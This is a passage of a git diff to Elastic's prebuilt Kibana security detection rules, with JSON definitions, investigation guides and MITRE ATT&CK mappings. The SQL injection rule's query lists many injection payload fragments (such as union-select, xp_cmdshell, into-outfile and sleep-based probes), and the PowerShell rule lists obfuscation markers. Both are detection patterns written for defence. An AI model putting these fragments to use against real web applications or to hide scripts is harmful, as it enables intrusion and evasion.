Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.018", + "name": "Python Startup Hooks", + "reference": "https://attack.mitre.org/techniques/T1546/018/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "7f65f984-5642-4291-a0a0-2bbefce4c617_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7f7a0ee1-7b6f-466a-85b4-110fb105f5e2_1.json b/packages/security_detection_engine/kibana/security_rule/7f7a0ee1-7b6f-466a-85b4-110fb105f5e2_1.json new file mode 100644 index 00000000000..b717b23d030 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7f7a0ee1-7b6f-466a-85b4-110fb105f5e2_1.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule detects potential SQL injection attempts in web server requests by identifying common SQL injection patterns in URLs. Such activity may indicate reconnaissance or exploitation attempts by attackers trying to manipulate backend databases or extract sensitive information.", + "from": "now-9m", + "index": [ + "logs-nginx.access-*", + "logs-apache.access-*", + "logs-apache_tomcat.access-*", + "logs-iis.access-*" + ], + "interval": "10m", + "language": "eql", + "license": "Elastic License v2", + "name": "Web Server Potential SQL Injection Request", + "query": "any where url.original like~ (\n \"*%20order%20by%*\", \"*dbms_pipe.receive_message%28chr%*\", \"*waitfor%20delay%20*\", \"*%28select%20*from%20pg_sleep%285*\", \"*%28select%28sleep%285*\", \"*%3bselect%20pg_sleep%285*\",\n \"*select%20concat%28concat*\", \"*xp_cmdshell*\", \"*select*case*when*\", \"*and*extractvalue*select*\", \"*from*information_schema.tables*\", \"*boolean*mode*having*\", \"*extractvalue*concat*\",\n \"*case*when*sleep*\", \"*select*sleep*\", \"*dbms_lock.sleep*\", \"*and*sleep*\", \"*like*sleep*\", \"*csleep*\", \"*pgsleep*\", \"*char*char*char*\", \"*union*select*\", \"*concat*select*\",\n \"*select*else*drop*\", \"*having*like*\", \"*case*else*end*\", \"*if*sleep*\", \"*where*and*select*\", \"*or*1=1*\", \"*\\\"1\\\"=\\\"1\\\"*\", \"*or*'a'='a*\", \"*into*outfile*\", \"*pga_sleep*\",\n \"*into%20outfile*\", \"*into*dumpfile*\", \"*load_file%28*\", \"*load%5ffile%28*\", \"*cast%28*\", \"*convert%28*\", \"*cast%28%*\", \"*convert%28%*\", \"*@@version*\", \"*@@version_comment*\",\n \"*version%28*\", \"*user%28*\", \"*current_user%28*\", \"*database%28*\", \"*schema_name%28*\", \"*information_schema.columns*\", \"*information_schema.columns*\", \"*table_schema*\",\n \"*column_name*\", \"*dbms_pipe*\", \"*dbms_lock%2e*sleep*\", \"*dbms_lock.sleep*\", \"*sp_executesql*\", \"*sp_executesql*\", \"*load%20data*\", \"*information_schema*\", \"*pg_slp*\",\n \"*information_schema.tables*\"\n)\n", + "required_fields": [ + { + "ecs": true, + "name": "url.original", + "type": "wildcard" + } + ], + "risk_score": 21, + "rule_id": "7f7a0ee1-7b6f-466a-85b4-110fb105f5e2", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Tactic: Credential Access", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "7f7a0ee1-7b6f-466a-85b4-110fb105f5e2_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7fc95782-4bd1-11f0-9838-f661ea17fbcd_2.json b/packages/security_detection_engine/kibana/security_rule/7fc95782-4bd1-11f0-9838-f661ea17fbcd_2.json index 33025b2a505..0358fab41eb 100644 --- a/packages/security_detection_engine/kibana/security_rule/7fc95782-4bd1-11f0-9838-f661ea17fbcd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/7fc95782-4bd1-11f0-9838-f661ea17fbcd_2.json @@ -61,7 +61,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/8025db49-c57c-4fc0-bd86-7ccd6d10a35a_108.json b/packages/security_detection_engine/kibana/security_rule/8025db49-c57c-4fc0-bd86-7ccd6d10a35a_108.json new file mode 100644 index 00000000000..9ade2bdb49a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8025db49-c57c-4fc0-bd86-7ccd6d10a35a_108.json @@ -0,0 +1,146 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies scripts that contain patterns and known methods that obfuscate PowerShell code. Attackers can use obfuscation techniques to bypass PowerShell security protections such as Antimalware Scan Interface (AMSI).", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.directory": { + "case_insensitive": true, + "value": "?:\\\\Program Files\\\\WindowsPowerShell\\\\Modules\\\\*" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.directory": { + "case_insensitive": true, + "value": "?:\\\\Program Files (x86)\\\\WindowsPowerShell\\\\Modules\\\\*" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\\\\*" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential PowerShell Obfuscated Script", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscated Script\n\nPowerShell is a powerful scripting language used for task automation and configuration management in Windows environments. Adversaries exploit its flexibility to obfuscate scripts, evading security measures like AMSI. The detection rule identifies obfuscation patterns, such as string manipulation and encoding techniques, to flag potentially malicious scripts, aiding in defense evasion detection.\n\n### Possible investigation steps\n\n- Review the PowerShell script block text captured in the alert to identify any suspicious patterns or obfuscation techniques, such as string manipulation or encoding methods like \"[string]::join\" or \"-Join\".\n- Check the process execution details, including the parent process and command line arguments, to understand the context in which the PowerShell script was executed.\n- Investigate the source and destination of the script execution by examining the host and user details to determine if the activity aligns with expected behavior or if it originates from an unusual or unauthorized source.\n- Analyze any network connections or file modifications associated with the PowerShell process to identify potential data exfiltration or lateral movement activities.\n- Correlate the alert with other security events or logs, such as Windows Event Logs or network traffic logs, to gather additional context and identify any related suspicious activities.\n- Assess the risk and impact of the detected activity by considering the severity and risk score provided in the alert, and determine if immediate remediation actions are necessary.\n\n### False positive analysis\n\n- Legitimate administrative scripts may use string manipulation and encoding techniques for benign purposes, such as data processing or configuration management. Review the context of the script execution and verify the source and intent before flagging it as malicious.\n- Scripts that automate complex tasks might use obfuscation-like patterns to handle data securely or efficiently. Consider whitelisting known scripts or trusted sources to reduce false positives.\n- Development and testing environments often run scripts with obfuscation patterns for testing purposes. Exclude these environments from the rule or create exceptions for specific users or groups involved in development.\n- Security tools and monitoring solutions might generate PowerShell scripts with obfuscation patterns as part of their normal operation. Identify these tools and exclude their activities from triggering the rule.\n- Regularly update the list of exceptions and whitelisted scripts to ensure that new legitimate scripts are not mistakenly flagged as threats.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further spread of potentially malicious scripts.\n- Terminate any suspicious PowerShell processes identified by the detection rule to halt ongoing malicious activity.\n- Conduct a thorough review of the PowerShell script block logs to identify and remove any obfuscated scripts or malicious code remnants.\n- Restore the system from a known good backup if malicious activity is confirmed and system integrity is compromised.\n- Update and patch the affected system to ensure all security vulnerabilities are addressed, reducing the risk of exploitation.\n- Monitor the system and network for any signs of re-infection or similar obfuscation patterns to ensure the threat has been fully mitigated.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[string]::join\" or\n \"-Join\" or\n \"[convert]::toint16\" or\n \"[char][int]$_\" or\n (\"ConvertTo-SecureString\" and \"PtrToStringAuto\") or\n \"-BXor\" or\n (\"replace\" and \"char\") or\n \"[array]::reverse\" or\n \"-replace\"\n ) and\n powershell.file.script_block_text : (\n (\"$pSHoMe[\" and \"+$pSHoMe[\") or\n (\"$ShellId[\" and \"+$ShellId[\") or\n (\"$env:ComSpec[4\" and \"25]-Join\") or\n ((\"Set-Variable\" or \"SV\" or \"Set-Item\") and \"OFS\") or\n (\"*MDR*\" and \"Name[3,11,2]\") or\n (\"$VerbosePreference\" and \"[1,3]+'X'-Join''\") or\n (\"rahc\" or \"ekovin\" or \"gnirts\" or \"ecnereferpesobrev\" or \"ecalper\" or \"cepsmoc\" or \"dillehs\") or\n (\"System.Management.Automation.$([cHAr]\" or \"System.$([cHAr]\" or \")+[cHAR]([byte]\")\n ) and\n not powershell.file.script_block_text : (\n (\"Copyright (c) 2018 Ansible Project\" or \"Export-ModuleMember -Function Add-CSharpType\") and\n (\"[Object]$AnsibleModule\" or \"$AnsibleModule.Tmpdir\")\n )\n", + "references": [ + "https://github.com/danielbohannon/Invoke-Obfuscation" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "8025db49-c57c-4fc0-bd86-7ccd6d10a35a", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "8025db49-c57c-4fc0-bd86-7ccd6d10a35a_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/809b70d3-e2c3-455e-af1b-2626a5a1a276_212.json b/packages/security_detection_engine/kibana/security_rule/809b70d3-e2c3-455e-af1b-2626a5a1a276_212.json new file mode 100644 index 00000000000..7c4374da2a3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/809b70d3-e2c3-455e-af1b-2626a5a1a276_212.json @@ -0,0 +1,67 @@ +{ + "attributes": { + "anomaly_threshold": 50, + "author": [ + "Elastic" + ], + "description": "A machine learning job detected AWS command activity that, while not inherently suspicious or abnormal, is sourcing from a geolocation (city) that is unusual for the command. This can be the result of compromised credentials or keys being used by a threat actor in a different geography than the authorized user(s).", + "false_positives": [ + "New or unusual command and user geolocation activity can be due to manual troubleshooting or reconfiguration; changes in cloud automation scripts or workflows; adoption of new services; expansion into new regions; increased adoption of work from home policies; or users who travel frequently." + ], + "from": "now-2h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "rare_method_for_a_city", + "name": "Unusual City For an AWS Command", + "note": "## Triage and analysis\n\n### Investigating Unusual City For an AWS Command\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and understanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity when deviations occur.\n\nThis rule uses a machine learning job to detect an AWS API command that while not inherently suspicious or abnormal, is sourcing from a geolocation (city) that is unusual for the command. This can be the result of compromised credentials or keys used by a threat actor in a different geography than the authorized user(s).\n\nDetection alerts from this rule indicate an AWS API command or method call that is rare and unusual for the geolocation of the source IP address.\n\n#### Possible investigation steps\n\n- Identify the user account involved and the action performed. Verify whether it should perform this kind of action.\n - Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context.\n - The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These might indicate the source of the program or the nature of its tasks.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal time of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- False positives can occur if activity is coming from new employees based in a city with no previous history in AWS.\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation module or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence), it might be part of a housekeeping or maintenance process. You can find the command in the `event.action field` field.\n\n### Related Rules\n\n- Unusual Country For an AWS Command - dca28dee-c999-400f-b640-50a081cc0fd1\n- Unusual AWS Command for a User - ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1\n- Rare AWS Error Code - 19de8096-e2b0-4bd8-80c9-34a820813fff\n- Spike in AWS Error Messages - 78d3d8d9-b476-451d-a9e0-7a5addd70670\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "aws", + "version": "^3.0.0" + } + ], + "risk_score": 21, + "rule_id": "809b70d3-e2c3-455e-af1b-2626a5a1a276", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from AWS.\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### AWS Integration Setup\nThe AWS integration allows you to collect logs and metrics from Amazon Web Services (AWS) with Elastic Agent.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"aws\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAWS\u201d and select the integration to see more details about it.\n- Click \u201cAdd AWS\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201caws\u201d to an existing or a new agent policy, and deploy the agent on your system from which aws log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://www.elastic.co/docs/current/integrations/aws).\n", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "type": "machine_learning", + "version": 212 + }, + "id": "809b70d3-e2c3-455e-af1b-2626a5a1a276_212", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_110.json b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_110.json deleted file mode 100644 index aeeeff0ded5..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_110.json +++ /dev/null @@ -1,119 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Indicates the creation and deletion of a scheduled task within a short time interval. Adversaries can use these to proxy malicious execution via the schedule service and perform clean up.", - "false_positives": [ - "Legitimate scheduled tasks may be created during installation of new software." - ], - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Temporarily Scheduled Task Creation", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Temporarily Scheduled Task Creation\n\nScheduled tasks in Windows environments automate routine tasks, but adversaries exploit them for persistence and execution by creating and quickly deleting tasks to mask malicious activity. The detection rule identifies such behavior by tracking task creation and deletion within a short timeframe, flagging potential misuse when these actions occur in rapid succession without typical user patterns.\n\n### Possible investigation steps\n\n- Review the winlog.computer_name field to identify the affected system and determine if it is a critical asset or part of a sensitive network segment.\n- Examine the winlog.event_data.TaskName to understand the nature of the task created and deleted, and assess if it aligns with known legitimate tasks or appears suspicious.\n- Investigate the user.name associated with the task creation and deletion events to determine if the activity was performed by a legitimate user or potentially compromised account.\n- Check for any related events or logs around the same timeframe on the affected system to identify any additional suspicious activities or anomalies.\n- Correlate the task creation and deletion events with other security alerts or incidents to determine if this activity is part of a broader attack campaign or isolated incident.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger the rule if system administrators frequently create and delete scheduled tasks for maintenance purposes. To manage this, create exceptions for known administrative accounts or specific task names that are part of regular operations.\n- Automated scripts or software updates that temporarily create scheduled tasks can also cause false positives. Identify these scripts or update processes and exclude their associated user accounts or task names from the detection rule.\n- Some legitimate applications may use scheduled tasks for temporary operations. Review application documentation to confirm such behavior and exclude these applications by their task names or associated user accounts.\n- In environments with frequent testing or development activities, developers might create and delete tasks as part of their workflow. Consider excluding developer accounts or specific task names used in testing environments to reduce noise.\n- Scheduled tasks created by monitoring or security tools for short-lived operations can be mistaken for malicious activity. Verify these tools' behavior and exclude their task names or user accounts if they are known to be safe.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further malicious activity and lateral movement.\n- Review the scheduled task details, including the task name and associated scripts or executables, to identify any malicious payloads or commands.\n- Terminate any malicious processes or executables identified from the scheduled task analysis to stop ongoing threats.\n- Restore any altered or deleted system files from a known good backup to ensure system integrity.\n- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any additional malware.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if other systems are affected.\n- Implement additional monitoring and alerting for similar scheduled task activities to enhance detection and prevent recurrence of this threat.", - "query": "sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m\n [iam where event.action == \"scheduled-task-created\" and not user.name : \"*$\"]\n [iam where event.action == \"scheduled-task-deleted\" and not user.name : \"*$\"]\n", - "references": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.computer_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.TaskName", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1053", - "name": "Scheduled Task/Job", - "reference": "https://attack.mitre.org/techniques/T1053/", - "subtechnique": [ - { - "id": "T1053.005", - "name": "Scheduled Task", - "reference": "https://attack.mitre.org/techniques/T1053/005/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1053", - "name": "Scheduled Task/Job", - "reference": "https://attack.mitre.org/techniques/T1053/", - "subtechnique": [ - { - "id": "T1053.005", - "name": "Scheduled Task", - "reference": "https://attack.mitre.org/techniques/T1053/005/" - } - ] - } - ] - } - ], - "type": "eql", - "version": 110 - }, - "id": "81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_110", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8383a8d0-008b-47a5-94e5-496629dc3590_2.json b/packages/security_detection_engine/kibana/security_rule/8383a8d0-008b-47a5-94e5-496629dc3590_2.json new file mode 100644 index 00000000000..bcc0e3f8cc6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8383a8d0-008b-47a5-94e5-496629dc3590_2.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects potential web server discovery or fuzzing activity by identifying a high volume of HTTP GET requests resulting in 404 or 403 status codes from a single source IP address within a short timeframe. Such patterns may indicate that an attacker is attempting to discover hidden or unlinked resources on a web server, which can be a precursor to more targeted attacks.", + "from": "now-11m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Web Server Discovery or Fuzzing Activity", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Web Server Discovery or Fuzzing Activity\n\nThis rule flags a single origin generating a rapid burst of GET requests that produce many 404/403 responses, a hallmark of automated web discovery or fuzzing. Attackers commonly run wordlist-driven enumeration to probe paths such as /admin/, /login, /backup.zip, /.env, /.git/, and undocumented API routes, gauging which resources exist and where access controls fail. Detecting this reconnaissance early helps prevent subsequent targeted exploitation of newly found endpoints and weak authentication flows.\n\n### Possible investigation steps\n\n- Correlate user-agent, TLS JA3/JA4, Host/SNI, and X-Forwarded-For to fingerprint the client, identify common fuzzing tools or disguised automation, and recover the true origin if traffic traversed a CDN or proxy.\n- Summarize the top requested paths and response codes for this source to spot any 2xx or 401 outcomes amid the denials, flagging hits on sensitive locations such as /.env, /.git, /admin interfaces, backups, installer scripts, and undocumented API routes.\n- Pivot to the same timeframe for adjacent web and authentication activity from this origin to see whether POSTs, credential attempts, or parameterized requests followed the enumeration, indicating progression toward exploitation or spraying.\n- Review WAF/CDN and reverse-proxy logs for blocks, challenges, or rate limiting and whether multiple virtual hosts were targeted via the Host header, confirming if and how far requests reached the application tier.\n- Validate whether the source aligns with approved internal scanners or scheduled testing via inventories and change records, and if not, enrich with ASN/geolocation, reverse DNS, and threat intel to assess reputation and recurrence across your estate.\n\n### False positive analysis\n\n- An internal QA link checker or monitoring crawler run from a single host can request hundreds of unique paths and generate many 404/403 GETs when routes, assets, or permissions are misconfigured.\n- A shared egress IP (NAT or corporate proxy) aggregating many users during a faulty deployment can trigger high volumes of 404/403 GETs as browsers collectively hit moved or newly restricted resources.\n\n### Response and remediation\n\n- Immediately rate-limit or block the offending source IP at the WAF/CDN and reverse proxy, applying a challenge or temporary ban to the observed User-Agent and JA3/JA4 fingerprint driving the 500+ unique-path 404/403 GET burst.\n- If traffic came through a proxy or CDN, use X-Forwarded-For to identify and block the true origin, and add a temporary ASN or geolocation block if the source aligns with known scanner networks.\n- Verify whether the source is an approved internal 